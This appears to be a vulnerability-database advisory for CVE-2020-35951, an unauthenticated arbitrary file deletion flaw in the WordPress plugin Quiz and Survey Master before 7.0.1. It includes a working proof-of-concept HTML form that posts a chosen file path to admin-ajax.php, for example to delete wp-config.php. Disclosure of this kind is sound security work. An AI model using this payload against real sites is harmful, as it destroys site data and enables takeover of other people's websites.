Lucene search
Chloe ChamberlandWPEX-ID:2C6A695F-7EB6-4D26-9C59-7CED35CD6129HistoryAug 13, 2020 - 12:00 a.m.
Quiz and Survey Master < 7.0.1 - Unauthenticated Arbitrary File Deletion
2020-08-1300:00:00
Chloe Chamberland
9
0.002 Low
EPSS
Percentile
54.8%
This flaw allows users to delete arbitrary files like a site’s wp-config.php file which could effectively take a site offline and allow an attacker to take over the vulnerable site.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://YOURURL/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="qsm_remove_file_fd_question" />
<input type="hidden" name="file_url" value="/path/to/file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
cve
cve
CVE-2020-35951
2021-01-01 04:15:13
wpvulndb
wpvulndb
Quiz and Survey Master < 7.0.1 - Unauthenticated Arbitrary File Deletion
2020-08-13 00:00:00
cvelist
cvelist
CVE-2020-35951
2021-01-01 03:27:03
nuclei
nuclei
Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion
2021-03-10 11:36:11
prion
prion
Buffer overflow
2021-01-01 04:15:00
nvd
nvd
CVE-2020-35951
2021-01-01 04:15:13
openvas
openvas
WordPress Quiz And Survey Master Plugin < 7.0.1 Multiple Vulnerabilities
2020-08-20 00:00:00